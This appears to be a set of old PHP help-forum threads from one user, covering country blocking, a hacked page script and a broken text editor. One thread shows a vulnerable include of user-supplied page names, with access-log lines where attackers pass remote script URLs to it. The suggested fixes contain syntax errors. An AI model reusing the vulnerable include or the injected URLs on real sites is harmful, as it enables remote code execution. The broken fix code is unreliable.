[Blocking Countries to certain PHP Pages?]

Hmm... unfortuantely I cannot install GeoIP on my sever.

 

does anyone know the code I would use in my .htaccess to band certain countries?

 

e.g. domains with .au ?

 

cheers,

Andrew

[Blocking Countries to certain PHP Pages?]

I also found an example at;

 

GeoIPEnable On

GeoIPDBFile /path/to/GeoIP.dat

 

# Redirect one country

RewriteEngine on

RewriteCond %{ENV:GEOIP_COUNTRY_CODE} ^CA$

RewriteRule ^(.*)$ http://www.canada.com$1 [L]

 

So if I put this HTACCESS file in a directory called comp, I could use the above code to redirect?

 

cheers,

Andrew

[Blocking Countries to certain PHP Pages?]

You can block by .HTACCESS, however from what I can understand, it blocks access to your entire site which is not what I want to achieve

[Blocking Countries to certain PHP Pages?]

Hi everyone,

 

is it possible to block certain countries from accessing individual pages?

 

For example, we have a competition page and we only want Australian Users from accessing it?

 

Can this be done through PHP? I don't want to block ENTIRE countries from the entire site, just a particular page?

 

Thanks in advance.

 

cheers,

Andrew

[PHP Code security exploit (PHP injuction) How do I fix this?]

http://www.pacote270178.xpg.com.br/teste2.txt

 

 

lol.....  It looks like who ever exploited your site is using your server to mass email.  Depending on how many people he's spamming, you get get some fun messages soon ;p.

 

First off, don't let people pass in the extension.  There's no reason to.  I would use just PHP pages.

 

Second, restrict it some how.  A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:

 

 

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) {
    require 'some/folder/' . $page . '.php';
}
else {
    echo "Page not found!";
}

 

 

Hi Corbin,

 

thanks for your help.

 

Just a quick question, I have a .htaccess file which displays the following:

 

RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]

 

and I put the following code in:

 

 

<?php

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';

if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {

    require 'dvd/' . $page . '.php;

}

else {

    echo "Page not found!";

}

?

 

Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111

 

What am I missing?

 

 

[PHP Code security exploit (PHP injuction) How do I fix this?]

1. This has nothing to do with object oriented programming (OOP).

2. Code tags are your friends.

3. Your problem stems from not securing your incoming query strings.  At all.

 

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages).  Then you can compare the incoming value with your list of legit pages.

 

$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names
$page = strtolower($_GET['page']); //make sure the incoming value is all lowercase

if(!in_array($page, $allowedPages))
{
   echo "I don't think so....";
}
else
{
   include $page . '.' . $type;
}

 

Hi Nightslyr, unfortuantely my site has quite few pages, any other ideas?

[PHP Code security exploit (PHP injuction) How do I fix this?]

Mchl wrote:

 

Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution.

 

How do I fix this?

[PHP Code security exploit (PHP injuction) How do I fix this?]

Hi Everyone,

 

I've got the following code in in a PHP which opens up a .HTM

 

<?php

if (isset($_GET["page"])){

$thepage = $_GET["page"];

$thetype = $_GET["type"];

include $thepage.'.'.$thetype;

}

?>

 

The problem is, this code is being exploited (see below for example).

 

Does anyone know how to stop this?

 

189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"

189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

 

 

 

cheers,

Andrew

[PHP CODE (simple online text editor that now doesn't work)]

hi there,
thanks for the assistance but unfortunately it didn't work. The server guys apparently installed phpsuexec after the crash happened over a week ago and registry_global = off? Would that be causing this?
regards,
Andrew

[PHP CODE (simple online text editor that now doesn't work)]

Hi all,
being a user at webfreaks for the last 2 years, their hard drive crashed a few weeks ago and now my simple PHP text editor will not work, I know they have done something on their end because it worked for the last two years. Here is the code that once worked:

It basically showed a list of text which I could edit online, nothing special but nice and quick, anyone know why this won't work anymore? The error I'm getting is:

Notice: Undefined variable: submit in /home2/impulse/public_html/admin/edit.php on line 3

Notice: Undefined variable: data in /home2/impulse/public_html/admin/edit.php on line 11

However, I never use to get this error until the server fiddled with something :( I'm at my wits end, any help would be GREATLY appreciated.

FILENAME: edit.php

<?php

if ($submit) {
$fp = fopen("data.txt", "w");
fwrite($fp, stripslashes($newdata));
fclose($fp);
}

$fp = fopen("data.txt", "r");
while (!feof($fp)) {
$data .= fgets($fp, 4096);
}
fclose($fp);

?>

<html>

<head>
<title>simple text editor</title>
</head>

<?php
$filemod = filemtime('data.txt');
$filemodtime = date("F j Y h:i:s A", $filemod);
echo "<center>This File was last updated $filemodtime</center>";
?>

</font>

<CENTER>
<form action="<? print $PHP_SELF; ?>" method="post"> 
<textarea name="newdata" rows="26" cols="40">
<?
print $data;
?>
</textarea><br>

<input type="submit" name="submit" value="Submit"></form>